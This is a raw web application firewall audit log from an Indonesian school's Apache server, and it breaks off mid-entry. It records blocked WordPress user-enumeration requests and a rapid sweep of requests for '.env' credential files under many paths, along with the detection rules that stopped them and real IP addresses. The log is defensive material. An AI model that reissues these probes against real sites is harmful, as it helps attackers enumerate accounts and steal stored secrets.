--a64d091c-Z-- --c1a6d231-A-- [16/May/2025:13:45:30 +0700] aCbfCkE0LfP59mkCzg72zgAAAM0 103.236.140.4 45924 103.236.140.4 8181 --c1a6d231-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.230.234.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.230.234.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c1a6d231-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1a6d231-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747377930403165 3139 (- - -) Stopwatch2: 1747377930403165 3139; combined=1397, p1=456, p2=912, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1a6d231-Z-- --60021223-A-- [16/May/2025:14:31:08 +0700] aCbpvNhEtho3ciA0weghPgAAAIw 103.236.140.4 46646 103.236.140.4 8181 --60021223-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.153.78.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.153.78.59 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --60021223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60021223-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747380668273782 787 (- - -) Stopwatch2: 1747380668273782 787; combined=323, p1=282, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60021223-Z-- --9346933b-A-- [16/May/2025:14:34:16 +0700] aCbqeMe47ocjCGWTS4b6_AAAAE8 103.236.140.4 46688 103.236.140.4 8181 --9346933b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 60.13.156.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 60.13.156.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9346933b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9346933b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747380856298794 3365 (- - -) Stopwatch2: 1747380856298794 3365; combined=1479, p1=502, p2=946, p3=0, p4=0, p5=31, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9346933b-Z-- --72fd4850-A-- [16/May/2025:14:55:21 +0700] aCbvace47ocjCGWTS4b7DQAAAFc 103.236.140.4 46964 103.236.140.4 8181 --72fd4850-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.247.170.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.247.170.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --72fd4850-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72fd4850-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747382121493708 3414 (- - -) Stopwatch2: 1747382121493708 3414; combined=1463, p1=477, p2=949, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72fd4850-Z-- --894d1d71-A-- [16/May/2025:15:03:29 +0700] aCbxUUE0LfP59mkCzg73SwAAANU 103.236.140.4 47084 103.236.140.4 8181 --894d1d71-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.62.24.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --894d1d71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --894d1d71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747382609219568 2581 (- - -) Stopwatch2: 1747382609219568 2581; combined=1106, p1=343, p2=742, p3=0, p4=0, p5=21, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --894d1d71-Z-- --5d11fe58-A-- [16/May/2025:15:40:49 +0700] aCb6Ede6THFz1hsaJaKRhAAAAAc 103.236.140.4 47570 103.236.140.4 8181 --5d11fe58-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --5d11fe58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d11fe58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384849038026 775 (- - -) Stopwatch2: 1747384849038026 775; combined=346, p1=313, p2=0, p3=0, p4=0, p5=32, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d11fe58-Z-- --66dea357-A-- [16/May/2025:15:40:49 +0700] aCb6Ece47ocjCGWTS4b7RQAAAEI 103.236.140.4 47572 103.236.140.4 8181 --66dea357-B-- GET /backend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --66dea357-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66dea357-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384849232758 695 (- - -) Stopwatch2: 1747384849232758 695; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66dea357-Z-- --ba4cd235-A-- [16/May/2025:15:40:49 +0700] aCb6Ede6THFz1hsaJaKRhQAAAA4 103.236.140.4 47574 103.236.140.4 8181 --ba4cd235-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ba4cd235-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba4cd235-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384849428049 726 (- - -) Stopwatch2: 1747384849428049 726; combined=316, p1=290, p2=0, p3=0, p4=0, p5=26, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba4cd235-Z-- --623e7e51-A-- [16/May/2025:15:40:49 +0700] aCb6Ede6THFz1hsaJaKRhgAAAAw 103.236.140.4 47576 103.236.140.4 8181 --623e7e51-B-- GET /code/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --623e7e51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --623e7e51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384849621433 658 (- - -) Stopwatch2: 1747384849621433 658; combined=248, p1=217, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --623e7e51-Z-- --bf213d7a-A-- [16/May/2025:15:40:49 +0700] aCb6Ece47ocjCGWTS4b7RgAAAEE 103.236.140.4 47578 103.236.140.4 8181 --bf213d7a-B-- GET /db/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --bf213d7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf213d7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384849814800 680 (- - -) Stopwatch2: 1747384849814800 680; combined=248, p1=217, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf213d7a-Z-- --a34ffc7c-A-- [16/May/2025:15:40:50 +0700] aCb6EthEtho3ciA0weghbgAAAIk 103.236.140.4 47580 103.236.140.4 8181 --a34ffc7c-B-- GET /login/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a34ffc7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a34ffc7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384850008285 763 (- - -) Stopwatch2: 1747384850008285 763; combined=327, p1=295, p2=0, p3=0, p4=0, p5=32, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a34ffc7c-Z-- --54b31834-A-- [16/May/2025:15:40:50 +0700] aCb6EkE0LfP59mkCzg73agAAANg 103.236.140.4 47582 103.236.140.4 8181 --54b31834-B-- GET /api_v1/go/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --54b31834-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54b31834-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384850202388 734 (- - -) Stopwatch2: 1747384850202388 734; combined=306, p1=272, p2=0, p3=0, p4=0, p5=34, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54b31834-Z-- --86ffae02-A-- [16/May/2025:15:40:50 +0700] aCb6EthEtho3ciA0weghbwAAAIg 103.236.140.4 47584 103.236.140.4 8181 --86ffae02-B-- GET /api_v1/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --86ffae02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86ffae02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384850396093 684 (- - -) Stopwatch2: 1747384850396093 684; combined=275, p1=244, p2=0, p3=0, p4=0, p5=31, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86ffae02-Z-- --a1ac3b17-A-- [16/May/2025:15:40:50 +0700] aCb6Ete6THFz1hsaJaKRhwAAAAk 103.236.140.4 47586 103.236.140.4 8181 --a1ac3b17-B-- GET /api_v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a1ac3b17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1ac3b17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384850590223 683 (- - -) Stopwatch2: 1747384850590223 683; combined=251, p1=220, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1ac3b17-Z-- --6294e159-A-- [16/May/2025:15:40:50 +0700] aCb6Ete6THFz1hsaJaKRiAAAABA 103.236.140.4 47588 103.236.140.4 8181 --6294e159-B-- GET /api_v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --6294e159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6294e159-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384850784224 685 (- - -) Stopwatch2: 1747384850784224 685; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6294e159-Z-- --c1dd9412-A-- [16/May/2025:15:40:51 +0700] aCb6E0E0LfP59mkCzg73awAAAMk 103.236.140.4 47592 103.236.140.4 8181 --c1dd9412-B-- GET /v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c1dd9412-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1dd9412-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384851173911 716 (- - -) Stopwatch2: 1747384851173911 716; combined=298, p1=266, p2=0, p3=0, p4=0, p5=32, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1dd9412-Z-- --539d8f56-A-- [16/May/2025:15:40:51 +0700] aCb6E9hEtho3ciA0weghcAAAAI4 103.236.140.4 47596 103.236.140.4 8181 --539d8f56-B-- GET /v1/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --539d8f56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --539d8f56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384851564184 692 (- - -) Stopwatch2: 1747384851564184 692; combined=272, p1=241, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --539d8f56-Z-- --4cd5b410-A-- [16/May/2025:15:40:51 +0700] aCb6E9e6THFz1hsaJaKRiQAAABI 103.236.140.4 47598 103.236.140.4 8181 --4cd5b410-B-- GET /admin/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) 